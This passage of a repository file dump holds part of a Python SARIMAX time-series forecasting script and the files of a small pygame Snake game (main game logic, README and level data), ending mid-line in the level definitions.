pdq:\n# \ttry:\n# \t\tmodel = sm.tsa.statespace.SARIMAX(W,\n# \t\t\t\t\t\t\t\t\t\t order=param,\n# \t\t\t\t\t\t\t\t\t\t seasonal_order=(0,0,0, 12),\n# \t\t\t\t\t\t\t\t\t\t enforce_stationarity=False,\n# \t\t\t\t\t\t\t\t\t\t enforce_invertibility=False)\n# \t\tresults = model.fit()\n# \t\tprint('ARIMA{} - AIC:{}'.format(param, results.aic), file=f)\n# \texcept:\n# \t\tcontinue\n\n# model = ARIMA(W, order=(p,d,q))\n# model_fit = model.fit(disp=0)\n# print(model_fit.summary())\n# print(model_fit.conf_int(), shape(model_fit.conf_int()))\n\n\n# f, Pxx_den = signal.periodogram(W - np.average(W), window='hamming')\n\n# # Draw QLB p-values plot\n# fig, ax = plt.subplots(figsize=(8, 3.8))\n# # ax.bar(lags[1:-1], pvalues[1:], color='crimson')\n# ax.semilogy(f, Pxx_den, color='crimson')\n# plt.grid()\n# plt.ylabel(r'$\\frac{1}{T} {|X_{T} (i \\omega)|}^2 $')\n# plt.xlabel(r'$\\omega$')\n# ax.xaxis.grid(b=True, which='both')\n# ax.yaxis.grid(b=True, which='both')\n# # plt.title(r'Ljung–Box Q test p-values')\n# #ax.legend(loc='best', frameon=True)\n# plt.draw()\n# fig.savefig(path.join(outpath, \"psd.png\"))\n# plt.clf()\n\n\n# final_model = sm.tsa.statespace.SARIMAX(W,\n# \t\t\t\t\t\t\t\t\t\torder=(2, 0, 14),\n# \t\t\t\t\t\t\t\t\t\tseasonal_order=(0,0,0, 12),\n# \t\t\t\t\t\t\t\t\t\tenforce_stationarity=False,\n# \t\t\t\t\t\t\t\t\t\tenforce_invertibility=False)\n# results = final_model.fit()\n# print(results.summary().tables[1])\n\n# pred = results.get_prediction(end=1023, dynamic=False)\n# pred_vals = pred.predicted_mean\n# pred_ci = pred.conf_int()\n\n# extended_n = np.arange(0, 1024, 1)\n\n# # Draw naive prediction plot\n# fig, ax = plt.subplots(figsize=(8, 3.8))\n# ax.scatter(fulln[1003:], pred_vals[1003:], \n# \t\t\tmarker='+',\n# \t\t\tcolor='crimson',\n# \t\t\tlabel='Prediction',\n# \t\t\tzorder=10)\n# ax.fill_between(fulln[1003:],\n# pred_ci[1003:, 0],\n# pred_ci[1003:, 1],\n# facecolor='gainsboro', \n# label='Confidence interval',\n# interpolate=True,\n# zorder=0)\n# ax.plot(fulln[800:], fullW[800:], ls='-', label='Raw signal', zorder=5)\n# plt.grid()\n# plt.ylabel(r'$W_{n}$')\n# plt.xlabel(r'$t_n$')\n# ax.xaxis.grid(b=True, which='both')\n# ax.yaxis.grid(b=True, which='both')\n# # plt.title(r'Ljung–Box Q test p-values')\n# ax.legend(loc='best', frameon=True)\n# plt.draw()\n# fig.savefig(path.join(outpath, \"validation.png\"))\n# 
plt.clf()\n\n\nfinal_model = sm.tsa.statespace.SARIMAX(fullW[65:],\n\t\t\t\t\t\t\t\t\t\torder=(2, 0, 14),\n\t\t\t\t\t\t\t\t\t\tseasonal_order=(0,0,0, 12),\n\t\t\t\t\t\t\t\t\t\tenforce_stationarity=False,\n\t\t\t\t\t\t\t\t\t\tenforce_invertibility=False)\nresults = final_model.fit()\nprint(results.summary().tables[1])\n\npred = results.get_prediction(end=1043, dynamic=False)\npred_vals = pred.predicted_mean\npred_ci = pred.conf_int()\n\nextended_n = np.arange(0, 1044, 1)\n\n# Draw naive prediction plot\nfig, ax = plt.subplots(figsize=(8, 3.8))\nax.scatter(extended_n[1024:], pred_vals[1024:], \n\t\t\tmarker='+',\n\t\t\tcolor='crimson',\n\t\t\tlabel='Prediction',\n\t\t\tzorder=10)\nax.fill_between(extended_n[1024:],\n pred_ci[1024, 0],\n pred_ci[1024:, 1],\n facecolor='gainsboro', \n label='Confidence interval',\n interpolate=True,\n zorder=0)\nax.plot(fulln[800:], fullW[800:], ls='-', label='Raw signal', zorder=5)\nplt.grid()\nplt.ylabel(r'$W_{n}$')\nplt.xlabel(r'$t_n$')\nax.xaxis.grid(b=True, which='both')\nax.yaxis.grid(b=True, which='both')\nax.legend(loc='upper left', frameon=True)\nplt.draw()\nfig.savefig(path.join(outpath, \"prediction.png\"))\nplt.clf()\n\nf = open('prediction.txt','w')\nprint('#timestamp, value, Confidence interval bounds', file=f)\nfor index in range(1024, 1043):\n\tprint(extended_n[index], pred_vals[index], pred_ci[index, 0], pred_ci[index, 1], file=f)\n" }, { "alpha_fraction": 0.800000011920929, "alphanum_fraction": 0.800000011920929, "avg_line_length": 24, "blob_id": "94a834098d774fb97c1a9968f5585451e82d9b79", "content_id": "8eec63e2dd673fa0c281f7fb526c26525c794ff3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 75, "license_type": "no_license", "max_line_length": 32, "num_lines": 3, "path": "/README.md", "repo_name": "VasilievArtyom/MLwarrior", "src_encoding": "UTF-8", "text": "# MLwarrior\nTop secret public repository.\nSee report.pdf file for details.\n" }, { "alpha_fraction": 0.601307213306427, "alphanum_fraction": 0.6277777552604675, "avg_line_length": 28.708738327026367, "blob_id": "cda3cc79dd88aacb1067b2d889ecd573c461d169", "content_id": "effb6a1685e79204cc6caffa7a01848b402655e2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3066, "license_type": "no_license", "max_line_length": 152, "num_lines": 103, "path": "/analize.py", "repo_name": "VasilievArtyom/MLwarrior", "src_encoding": "UTF-8", "text": "import math\nimport numpy as np\nfrom numpy import *\nfrom scipy.optimize import curve_fit\nfrom scipy import signal\nfrom os import path\nimport matplotlib.pyplot as plt\nfrom statsmodels.tsa.stattools import acf, pacf\n\n\nplt.rc('text', usetex=True)\n\noutpath = \"plots\"\ninpath = \"\"\n\ncurrentfile = \"data.txt\"\n\n# Read from file\nfulln, fullW= np.loadtxt(path.join(inpath, currentfile), usecols=(0, 1), unpack=True)\n\n# # Draw Raw data plot\n# fig, ax = plt.subplots(figsize=(8, 3.8))\n# ax.plot(n, W, ls='-')\n# plt.grid()\n# plt.ylabel(r'$W_{n}$')\n# plt.xlabel(r'$t_n$')\n# ax.xaxis.grid(b=True, which='both')\n# ax.yaxis.grid(b=True, which='both')\n# #plt.title(r'$I(t) = I_0^A (1 - 2 \\exp (\\frac{-t }{T_1^A})) + I_0^B (1 - 2 \\exp (\\frac{-t }{T_1^B}))$')\n# #ax.legend(loc='best', frameon=True)\n# plt.draw()\n# fig.savefig(path.join(outpath, \"raw.png\"))\n# plt.clf()\n\nn = fulln[65:1003]\nW = fullW[65:1003]\n\n# # Draw Raw data plot\n# fig, ax = plt.subplots(figsize=(8, 3.8))\n# ax.plot(n, W, ls='-')\n# plt.grid()\n# 
plt.ylabel(r'$W_{n}$')\n# plt.xlabel(r'$t_n$')\n# ax.xaxis.grid(b=True, which='both')\n# ax.yaxis.grid(b=True, which='both')\n# #plt.title(r'$I(t) = I_0^A (1 - 2 \\exp (\\frac{-t }{T_1^A})) + I_0^B (1 - 2 \\exp (\\frac{-t }{T_1^B}))$')\n# #ax.legend(loc='best', frameon=True)\n# plt.draw()\n# fig.savefig(path.join(outpath, \"raw_cut.png\"))\n# plt.clf()\n\n\n# nlags=200\n# acf_val, confit_val, qstat_val, pvalues = acf(W, unbiased=True, nlags=nlags-1, qstat=True, alpha=.05)\n# lags=np.arange(1, nlags+1, 1)\n\n\n# # Draw acf plot\n# fig, ax = plt.subplots(figsize=(4, 3.8))\n# ax.fill_between(lags[1:], confit_val[1:, 0], confit_val[1:, 1], where=confit_val[1:, 1] >= confit_val[1:, 0], facecolor='gainsboro', interpolate=True)\n# #ax.scatter(lags[1:], acf_val[1:], marker='+', color='crimson')\n# ax.bar(lags[1:], acf_val[1:], color='crimson')\n# plt.grid()\n# #plt.ylabel(r'$r_{\\tau}$')\n# plt.xlabel(r'$\\tau$')\n# ax.xaxis.grid(b=True, which='both')\n# ax.yaxis.grid(b=True, which='both')\n# plt.title(r'$r_{\\tau}$')\n# #ax.legend(loc='best', frameon=True)\n# plt.draw()\n# fig.savefig(path.join(outpath, \"acf200.png\"))\n# plt.clf()\n\n# # Draw QLB p-values plot\n# fig, ax = plt.subplots(figsize=(4, 3.8))\n# ax.bar(lags[1:-1], pvalues[1:], color='crimson')\n# plt.grid()\n# # plt.ylabel(r'Ljung–Box Q test p-values')\n# plt.xlabel(r'$n$')\n# ax.xaxis.grid(b=True, which='both')\n# ax.yaxis.grid(b=True, which='both')\n# plt.title(r'Ljung–Box Q test p-values')\n# #ax.legend(loc='best', frameon=True)\n# plt.draw()\n# fig.savefig(path.join(outpath, \"qlb200.png\"))\n# plt.clf()\n\nf, Pxx_den = signal.periodogram(W - np.average(W), window='hamming')\n\n# Draw QLB p-values plot\nfig, ax = plt.subplots(figsize=(8, 3.8))\n# ax.bar(lags[1:-1], pvalues[1:], color='crimson')\nax.semilogy(f, Pxx_den, color='crimson')\nplt.grid()\nplt.ylabel(r'$\\frac{1}{T} {|X_{T} (i \\omega)|}^2 $')\nplt.xlabel(r'$\\omega$')\nax.xaxis.grid(b=True, which='both')\nax.yaxis.grid(b=True, which='both')\n# plt.title(r'Ljung–Box Q test p-values')\n#ax.legend(loc='best', frameon=True)\nplt.draw()\nfig.savefig(path.join(outpath, \"psd.png\"))\nplt.clf()\n" } ]
3
haklir/Snake_42
https://github.com/haklir/Snake_42
a060a08e005efe57585d6a66621aea6b507333f8
f08f18abfb0029cd70bf9ab37dfbeb5580485bd5
8c32548f46d5f4aedc8649d8ecab5992477b594c
refs/heads/master
2020-03-12T20:39:51.278646
2018-09-26T20:01:41
2018-09-26T20:01:41
130,364,163
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6850828528404236, "alphanum_fraction": 0.7071823477745056, "avg_line_length": 29.16666603088379, "blob_id": "26a75501358c25d6c1deef1a576a1a8056443b06", "content_id": "4a6dc1c977beaae1490b75e4ea3344a5e09f39b6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 181, "license_type": "no_license", "max_line_length": 135, "num_lines": 6, "path": "/README.md", "repo_name": "haklir/Snake_42", "src_encoding": "UTF-8", "text": "# Snake_42\nSnake 42 is a simple game\n\nThis game was made with Python using pygame (pygame.org). Simple, 'elegant' and works like a charm! Also, this is a work in progress...\n\n-----\n" }, { "alpha_fraction": 0.4978077709674835, "alphanum_fraction": 0.5165823698043823, "avg_line_length": 35.77070236206055, "blob_id": "e66f8b5511175d40f37a75c2080a013715337b01", "content_id": "5b4cbe6d3db71b446a4ba3e7ed94cadf3436dbfd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 17790, "license_type": "no_license", "max_line_length": 119, "num_lines": 471, "path": "/snake_42.py", "repo_name": "haklir/Snake_42", "src_encoding": "UTF-8", "text": "\"\"\"\r\n## -------- ##\r\n## SNAKE 42 ##\r\n## -------- ##\r\n\"\"\"\r\nimport os\r\nimport sys\r\nfrom re import search\r\nfrom random import randint\r\n\r\nfrom pygame.locals import *\r\nimport pygame as pg\r\nimport snake_data as data\r\n\r\n\r\ndef get_settings():\r\n try:\r\n with open(\"settings.txt\") as file:\r\n settings = file.read()\r\n\r\n name = search(r'(?<=name=).*', settings).group()\r\n play_music = False if search(r'(?<=play_music=).*', settings).group() == \"False\" else True\r\n # First eval returns string in form 'data.GREEN_SNAKE'. Second returns actual Surface from data\r\n snake_color = eval(eval(\"search(r'(?<=snake_color=).*', settings).group()\"))\r\n\r\n except FileNotFoundError:\r\n name = data.DEFAULT_NAME\r\n play_music = True\r\n snake_color = data.GREEN_SNAKE\r\n save_settings(name, play_music, \"data.GREEN_SNAKE\")\r\n\r\n return name, play_music, snake_color\r\n\r\n\r\ndef save_settings(name, play_music, snake_color):\r\n \"\"\" Saves selected settings into settings.txt. \"\"\"\r\n if snake_color == data.GREEN_SNAKE:\r\n snake_color_string = \"data.GREEN_SNAKE\"\r\n else:\r\n snake_color_string = \"data.ORANGE_SNAKE\"\r\n\r\n with open(\"settings.txt\", \"w\") as file:\r\n file.write(\r\n f\"name={name}\\n\"\r\n f\"play_music={play_music}\\n\"\r\n f\"snake_color={snake_color_string}\"\r\n )\r\n\r\n\r\nclass Game:\r\n \"\"\"\r\n Game class. Contains methods:\r\n - main_menu(self) -> name, snake_color\r\n - This runs the main menu.\r\n - pause(self) -> Boolean\r\n - Logic for pause control when player presses K_p\r\n - place_food(self) -> None\r\n - Places food on the field\r\n - change_level(self, level) -> None\r\n - Runs whenever player advances a level\r\n \"\"\"\r\n\r\n food_is_super = False\r\n food_position = (300, 300)\r\n\r\n def __init__(self):\r\n self.height = 600\r\n self.width = 600\r\n self.speed = 6\r\n self.score = 0\r\n self.walls = data.levels[0]\r\n self.playing = True\r\n pg.mouse.set_visible(True)\r\n data.SCREEN.fill(data.BLACK)\r\n _, self.play_music, self.snake_color = get_settings()\r\n\r\n def _draw_main_menu(self):\r\n \"\"\" Used to draw initial main menu and fetch name and snake_color settings. Returns name from settings.txt. 
\"\"\"\r\n\r\n data.SCREEN.fill(data.BLACK)\r\n draw_text_box('title:SNAKE 42', Rect(300, 70, 0, 0), data.RED)\r\n draw_text_box('Start', data.START_BOX, data.RED)\r\n draw_text_box('small:Enter name', Rect(300, 270, 0, 0))\r\n draw_text_box('small:Select color', Rect(300, 370, 0, 0))\r\n pg.draw.rect(data.SCREEN, data.LIGHTGREEN, data.GREEN_SNAKE_BOX)\r\n pg.draw.rect(data.SCREEN, data.ORANGE, data.ORANGE_SNAKE_BOX)\r\n\r\n music_text = \"Music off\" if self.play_music else \"Music on\"\r\n draw_text_box(music_text, data.MUSIC_BOX, text_color=data.RED)\r\n\r\n name, _, _ = get_settings()\r\n\r\n return name\r\n\r\n @staticmethod\r\n def _update_main_menu(name, name_input_color):\r\n \"\"\" Draws updated main menu. Used inside main_menu method. \"\"\"\r\n # Draw data.BLUE border around chosen snake_color box.\r\n if game.snake_color == data.GREEN_SNAKE:\r\n pg.draw.rect(data.SCREEN, data.BLUE, data.GREEN_SNAKE_BOX, 2)\r\n pg.draw.rect(data.SCREEN, data.BLACK, data.ORANGE_SNAKE_BOX, 2)\r\n else:\r\n pg.draw.rect(data.SCREEN, data.BLACK, data.GREEN_SNAKE_BOX, 2)\r\n pg.draw.rect(data.SCREEN, data.BLUE, data.ORANGE_SNAKE_BOX, 2)\r\n\r\n name_width = data.FONT.size(name)[0]\r\n # Set w and h larger to clear old borders and name.\r\n data.NAME_BOX.w += 5\r\n data.NAME_BOX.h += 5\r\n draw_text_box('', data.NAME_BOX, data.BLACK, data.BLACK)\r\n data.NAME_BOX.h -= 5\r\n # Set data.NAME_BOX width to match maximum of name_width and 100 pixels.\r\n data.NAME_BOX.w = max(100, name_width + 15)\r\n data.NAME_BOX.x = 300 - data.NAME_BOX.w / 2\r\n # Draw name in data.NAME_BOX.\r\n draw_text_box(name, data.NAME_BOX, data.RED, name_input_color, 2)\r\n\r\n pg.display.update()\r\n\r\n @staticmethod\r\n def _close_main_menu(name):\r\n \"\"\" Runs when game is started. Plays animation of menu sliding up. \"\"\"\r\n pg.mouse.set_visible(False)\r\n\r\n # Animation of menu sliding up.\r\n bottom = 600\r\n i = 1\r\n org_screen = data.SCREEN.copy()\r\n while bottom > 0:\r\n data.SCREEN.blit(org_screen, (0, bottom - 600))\r\n pg.display.update()\r\n pg.time.delay(17)\r\n bottom -= i*i / 2\r\n i += 1\r\n\r\n # Init game field graphics.\r\n data.SCREEN.fill(data.BLACK)\r\n pg.draw.rect(data.SCREEN, data.GREY, data.STATUS_BAR)\r\n text_surface = data.SMALL_FONT.render(name, True, data.RED)\r\n data.SCREEN.blit(text_surface, (10, 605))\r\n draw_text_box('small:0', Rect(580, 600, 0, 0), data.RED, data.GREY)\r\n for wall in game.walls:\r\n data.SCREEN.blit(data.BRICK, wall)\r\n\r\n def main_menu(self):\r\n \"\"\" Main menu loop etc. This method is way too large... 
\"\"\"\r\n finished = False\r\n name_input_color = data.GREEN\r\n name_input_active = False\r\n name = self._draw_main_menu()\r\n\r\n # Logic and loop for data.NAME_BOX and color choosing.\r\n while not finished:\r\n for event in pg.event.get():\r\n if event.type == pg.QUIT:\r\n if wanna_quit():\r\n save_settings(name, game.play_music, game.snake_color)\r\n sys.exit()\r\n if event.type == pg.MOUSEBUTTONDOWN:\r\n if data.START_BOX.collidepoint(event.pos):\r\n finished = True\r\n elif data.MUSIC_BOX.collidepoint(event.pos):\r\n # noinspection PyAttributeOutsideInit\r\n game.play_music = not game.play_music\r\n if game.play_music:\r\n data.MUSIC.play(-1)\r\n else:\r\n data.MUSIC.stop()\r\n music_text = \"Music off\" if game.play_music else \"Music on\"\r\n draw_text_box(music_text, data.MUSIC_BOX, text_color=data.RED)\r\n if data.NAME_BOX.collidepoint(event.pos):\r\n name_input_active = True\r\n name_input_color = data.BLUE\r\n else:\r\n name_input_active = False\r\n name_input_color = data.GREEN\r\n if data.GREEN_SNAKE_BOX.collidepoint(event.pos):\r\n game.snake_color = data.GREEN_SNAKE\r\n elif data.ORANGE_SNAKE_BOX.collidepoint(event.pos):\r\n game.snake_color = data.ORANGE_SNAKE\r\n if event.type == pg.KEYDOWN:\r\n if event.key == K_ESCAPE:\r\n if wanna_quit():\r\n save_settings(name, game.play_music, game.snake_color)\r\n sys.exit()\r\n else:\r\n pg.mouse.set_visible(True)\r\n elif name_input_active:\r\n if event.key == pg.K_RETURN:\r\n name_input_active = False\r\n name_input_color = data.GREEN\r\n elif event.key == pg.K_BACKSPACE:\r\n name = name[:-1]\r\n elif len(name) < 15:\r\n name += event.unicode\r\n\r\n self._update_main_menu(name, name_input_color)\r\n pg.time.delay(30)\r\n\r\n self._close_main_menu(name)\r\n save_settings(name, game.play_music, game.snake_color)\r\n return name\r\n\r\n @staticmethod\r\n def pause():\r\n \"\"\" Pauses game when p is pressed during play. Game continues when p is pressed again. \"\"\"\r\n\r\n org_screen = data.SCREEN.copy()\r\n draw_text_box('title:PAUSED', Rect(300, 275, 0, 0), data.RED)\r\n pg.display.update()\r\n while True:\r\n for event in pg.event.get():\r\n if event.type == pg.QUIT:\r\n if wanna_quit():\r\n game.playing = False\r\n update_highscores()\r\n return True\r\n if event.type == KEYDOWN:\r\n if event.key == K_ESCAPE:\r\n if wanna_quit():\r\n game.playing = False\r\n update_highscores()\r\n return True\r\n elif event.key == K_p:\r\n pg.time.delay(100)\r\n data.SCREEN.blit(org_screen, (0, 0))\r\n pg.event.get()\r\n return\r\n pg.time.delay(50)\r\n\r\n @staticmethod\r\n def place_food():\r\n \"\"\" Places new food in a random free spot. \"\"\"\r\n\r\n Game.food_is_super = False\r\n\r\n while True: # Runs until the random spot is free of snake and wall.\r\n Game.food_position = (randint(0, 29) * 20, randint(0, 29) * 20)\r\n if Game.food_position not in player.snake + game.walls:\r\n # 1/20 chance for placed food to be data.SUPERFOOD\r\n # which speeds up snake when eaten.\r\n if randint(0, 20) == 0:\r\n data.SCREEN.blit(data.SUPERFOOD, Game.food_position)\r\n Game.food_is_super = True\r\n else:\r\n data.SCREEN.blit(data.FOOD, Game.food_position)\r\n break\r\n\r\n def change_level(self, level):\r\n \"\"\" Clears data.SCREEN, cuts snake, moves it to start and draws new walls. 
\"\"\"\r\n\r\n # Clear data.SCREEN by covering it in black.\r\n draw_text_box('', Rect(0, 0, self.width, self.height), box_color=data.BLACK)\r\n\r\n # Move snake to start.\r\n player.snake = data.STARTING_SQUARES\r\n for position in player.snake:\r\n data.SCREEN.blit(player.img, position)\r\n\r\n # Draw new walls.\r\n self.walls = data.levels[level % len(data.levels)]\r\n for wall in self.walls:\r\n data.SCREEN.blit(data.BRICK, wall)\r\n\r\n # Replace food if it's on new walls or snake.\r\n if Game.food_position in player.snake:\r\n data.SCREEN.blit(player.img, Game.food_position)\r\n self.place_food()\r\n elif Game.food_position in self.walls:\r\n data.SCREEN.blit(data.BRICK, Game.food_position)\r\n self.place_food()\r\n else:\r\n data.SCREEN.blit(data.FOOD, Game.food_position)\r\n\r\n # Change level number and update data.SCREEN.\r\n draw_text_box('small:' + str(player.lvl), Rect(560, 600, 40, 30), data.RED, data.GREY)\r\n pg.display.update()\r\n\r\n # Reset snake direction and speed.\r\n self.speed = 6\r\n player.vx = 20\r\n player.vy = 0\r\n pg.time.delay(1000)\r\n pg.event.get()\r\n\r\n\r\nclass Player:\r\n \"\"\" Class for creating a player. Contains only move method.\"\"\"\r\n\r\n def __init__(self, name):\r\n self.name = name\r\n self.snake = [(140, 100), (160, 100), (180, 100), (200, 100)]\r\n self.img = game.snake_color\r\n for position in self.snake:\r\n data.SCREEN.blit(self.img, position)\r\n self.vx = 20\r\n self.vy = 0\r\n self.lvl = 0\r\n pg.display.update()\r\n\r\n def move(self):\r\n \"\"\" Processes players actions during game loop. \"\"\"\r\n\r\n score_box = Rect(data.SMALL_FONT.size(self.name)[0] + 20, 600, 100, 30)\r\n events = pg.event.get()\r\n for event in events:\r\n if event.type == pg.QUIT:\r\n if wanna_quit():\r\n game.playing = False\r\n update_highscores()\r\n return\r\n if event.type != KEYDOWN:\r\n continue\r\n if event.key == K_ESCAPE:\r\n if wanna_quit():\r\n game.playing = False\r\n update_highscores()\r\n return\r\n elif event.key == K_p:\r\n if game.pause():\r\n return\r\n elif event.key == K_UP and self.vy != 20:\r\n self.vx = 0\r\n self.vy = -20\r\n break\r\n elif event.key == K_RIGHT and self.vx != -20:\r\n self.vx = 20\r\n self.vy = 0\r\n break\r\n elif event.key == K_DOWN and self.vy != -20:\r\n self.vx = 0\r\n self.vy = 20\r\n break\r\n elif event.key == K_LEFT and self.vx != 20:\r\n self.vx = -20\r\n self.vy = 0\r\n break\r\n\r\n # Next position of snakes head with current direction.\r\n head_position = ((self.snake[-1][0] + self.vx) % game.width,\r\n (self.snake[-1][1] + self.vy) % game.height)\r\n\r\n if head_position == Game.food_position:\r\n data.CHOMP.play()\r\n if Game.food_is_super:\r\n game.speed = 8\r\n elif game.speed > 6:\r\n game.speed -= 1\r\n game.score += 20\r\n game.place_food()\r\n elif head_position in self.snake + game.walls:\r\n data.UGH.play()\r\n pg.time.delay(1500)\r\n game.playing = False\r\n update_highscores()\r\n return\r\n else:\r\n # Removes tail if no food was eaten.\r\n data.SCREEN.blit(data.BACK, player.snake.pop(0))\r\n if Game.food_is_super:\r\n data.SCREEN.blit(data.SUPERFOOD, Game.food_position)\r\n else:\r\n data.SCREEN.blit(data.FOOD, Game.food_position)\r\n\r\n self.snake.append(head_position)\r\n data.SCREEN.blit(self.img, head_position)\r\n\r\n # Draws game.score on STATUS_BAR.\r\n pg.draw.rect(data.SCREEN, data.GREY, score_box)\r\n text_surface = data.SMALL_FONT.render(str(game.score), True, data.RED)\r\n data.SCREEN.blit(text_surface, (score_box.x, 605))\r\n pg.display.update()\r\n\r\n if game.score >= 
(self.lvl + 1) * 200:\r\n draw_text_box('title:LVL UP!', Rect(300, 275, 0, 0), text_color=data.GREEN)\r\n pg.display.update()\r\n data.VICTORY.play()\r\n pg.time.delay(2000)\r\n self.lvl += 1\r\n game.change_level(self.lvl)\r\n\r\n\r\ndef draw_text_box(text, box, text_color=data.YELLOW, box_color=data.GREEN, border=0):\r\n \"\"\"\r\n Draws box with horizontally centered text. Top of text at box.y + 5.\r\n To draw with TITLE_FONT pass text parameter as \"title:<your text>\".\r\n To draw with FONT pass text parameter as \"<your text>\".\r\n To draw with SMALL_FONT pass text parameter as \"small:<your text>\".\r\n \"\"\"\r\n\r\n if text[0:6] == 'title:':\r\n text_surface = data.TITLE_FONT.render(text[6:], True, text_color)\r\n elif text[0:6] == 'small:':\r\n text_surface = data.SMALL_FONT.render(text[6:], True, text_color)\r\n else:\r\n text_surface = data.FONT.render(text, True, text_color)\r\n\r\n if box.w > 0 and box.h > 0:\r\n pg.draw.rect(data.SCREEN, box_color, box, border)\r\n data.SCREEN.blit(text_surface, (box.x + box.w/2 - text_surface.get_width()/2, box.y + 4))\r\n\r\n\r\ndef wanna_quit():\r\n \"\"\" Runs when esc or pg.QUIT activated. \"\"\"\r\n\r\n # Draw quitting dialog box in middle of screen.\r\n pg.mouse.set_visible(True)\r\n org_screen = data.SCREEN.copy()\r\n back_box = Rect(200, 200, 200, 160)\r\n quit_box = Rect(250, 260, 100, 35)\r\n continue_box = Rect(250, 305, 100, 35)\r\n draw_text_box('Wanna quit?', back_box, box_color=data.BLUE)\r\n draw_text_box('Yes', quit_box)\r\n draw_text_box('No', continue_box)\r\n pg.display.update()\r\n\r\n # Runs until player chooses Yes or No.\r\n while True:\r\n for event in pg.event.get():\r\n if event.type == MOUSEBUTTONDOWN:\r\n if quit_box.collidepoint(event.pos):\r\n return True\r\n elif continue_box.collidepoint(event.pos):\r\n data.SCREEN.blit(org_screen, (0, 0))\r\n pg.display.update()\r\n pg.mouse.set_visible(False)\r\n return False\r\n pg.time.delay(25)\r\n\r\n\r\ndef update_highscores():\r\n \"\"\" Updates and keeps record of 10 highest scores. 
\"\"\"\r\n\r\n score_entry = f'{player.name}- -{game.score}'\r\n score_file = 'highscores.txt'\r\n highscores = score_entry\r\n\r\n if os.path.isfile(score_file):\r\n with open(score_file) as file:\r\n score_data = file.read()\r\n\r\n if score_data:\r\n score_data = score_data.split('\\n')\r\n for line in score_data:\r\n if game.score > int(search(r'(?<=- -)\\d+$', line).group()):\r\n score_data.insert(score_data.index(line), score_entry)\r\n break\r\n highscores = '\\n'.join(score_data[:10])\r\n\r\n with open(score_file, 'w') as file:\r\n file.write(highscores)\r\n\r\n\r\nif __name__ == '__main__':\r\n pg.mixer.init()\r\n pg.mouse.set_cursor((8, 8), (4, 4), (24, 24, 24, 231, 231, 24, 24, 24), (0, 0, 0, 0, 0, 0, 0, 0))\r\n while True:\r\n game = Game()\r\n if game.play_music:\r\n data.MUSIC.play(-1)\r\n player = Player(game.main_menu()) # main_menu returns name\r\n pg.time.delay(500)\r\n while game.playing:\r\n player.move()\r\n # Delay dictates game speed.\r\n pg.time.delay(int(25 * (11 - game.speed)))\r\n save_settings(player.name, game.play_music, game.snake_color)\r\n data.MUSIC.stop()\r\nelse:\r\n # For testing purposes\r\n game = Game()\r\n" }, { "alpha_fraction": 0.47285714745521545, "alphanum_fraction": 0.5867857336997986, "avg_line_length": 25.7227725982666, "blob_id": "5ca1fade1c56ccf435a06b1b3e9d39c08af7ae3b", "content_id": "f848954d91997c3b5618c4ec3c4635983f0627bf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2800, "license_type": "no_license", "max_line_length": 91, "num_lines": 101, "path": "/snake_data.py", "repo_name": "haklir/Snake_42", "src_encoding": "UTF-8", "text": "# ------------------------------------ #\r\n# LEVEL AND CONSTANT DATA FOR SNAKE 42 #\r\n# ------------------------------------ #\r\n# Field is 30x30 squares. 
Each square is 20x20 pixels.\r\n# Bottom of the screen has a 30 pixel tall status bar when playing.\r\n# --> total screen size is 600x630 pixels.\r\n\r\n\r\nimport os\r\nimport pygame as pg\r\nfrom random import randint\r\nfrom pygame.locals import *\r\n\r\npg.init()\r\n\r\n# Colors in rgb format\r\nGREEN = (13, 89, 28)\r\nLIGHTGREEN = (34, 177, 76)\r\nORANGE = (255, 127, 39)\r\nGREY = (160, 163, 165)\r\nYELLOW = (229, 212, 57)\r\nRED = (239, 14, 14)\r\nBLUE = (72, 92, 242)\r\nBLACK = (0, 0, 0)\r\n\r\n# Images and sounds\r\nos.chdir(\"media\")\r\nBACK = pg.image.load('back.png') # Black 20x20 square, used for resetting.\r\nFOOD = pg.image.load('food.png')\r\nSUPERFOOD = pg.image.load('SUPERFOOD.png')\r\nGREEN_SNAKE = pg.image.load('snake1.png')\r\nORANGE_SNAKE = pg.image.load('snake2.png')\r\nBRICK = pg.image.load('BRICK.png')\r\nSMALL_FONT = pg.font.Font('kindergarten.ttf', 20)\r\nFONT = pg.font.Font('kindergarten.ttf', 32)\r\nTITLE_FONT = pg.font.Font('kindergarten.ttf', 50)\r\nCHOMP = pg.mixer.Sound('CHOMP.wav')\r\nVICTORY = pg.mixer.Sound('VICTORY.wav')\r\nMUSIC = pg.mixer.Sound('MUSIC.wav')\r\nUGH = pg.mixer.Sound('UGH.wav')\r\nMUSIC.set_volume(0.45)\r\nos.chdir(\"..\")\r\n\r\n# Rects\r\nSTART_BOX = Rect(250, 200, 100, 35)\r\nNAME_BOX = Rect(250, 300, 100, 40)\r\nGREEN_SNAKE_BOX = Rect(260, 400, 30, 30)\r\nORANGE_SNAKE_BOX = Rect(310, 400, 30, 30)\r\nMUSIC_BOX = Rect(226, 470, 152, 35)\r\n\r\n# Display\r\nSCREEN = pg.display.set_mode((600, 630))\r\nSTATUS_BAR = Rect(0, 600, 600, 30)\r\n\r\n# Other constants\r\nSTARTING_SQUARES = [(140, 100), (160, 100), (180, 100), (200, 100)]\r\nDEFAULT_NAME = \"Snakey\"\r\n\r\nlevels = []\r\n\r\n\r\ndef random_level(n):\r\n \"\"\" Creates a level with n randomly placed walls. \"\"\"\r\n level = []\r\n while len(level) < n:\r\n wall = (randint(0, 14) * 40, randint(0, 29) * 20)\r\n if wall not in STARTING_SQUARES + [(220, 100), (240, 100)] + level:\r\n level.append(wall)\r\n return level\r\n\r\n\r\n# empty field\r\n_0 = []\r\nlevels.append(_0)\r\n\r\n# horizontal bars in middle\r\n_1 = [(i, 200) for i in range(100, 520, 20)] + [(i, 400) for i in range(100, 520, 20)]\r\nlevels.append(_1)\r\n\r\n# walls around field\r\n_2 = [(i, 0) for i in range(0, 600, 20)] + [(i, 580) for i in range(0, 600, 20)]\r\n_2 += [(0, i) for i in range(0, 600, 20)] + [(580, i) for i in range(0, 600, 20)]\r\nlevels.append(_2)\r\n\r\n_3 = random_level(20)\r\nlevels.append(_3)\r\n\r\n_4 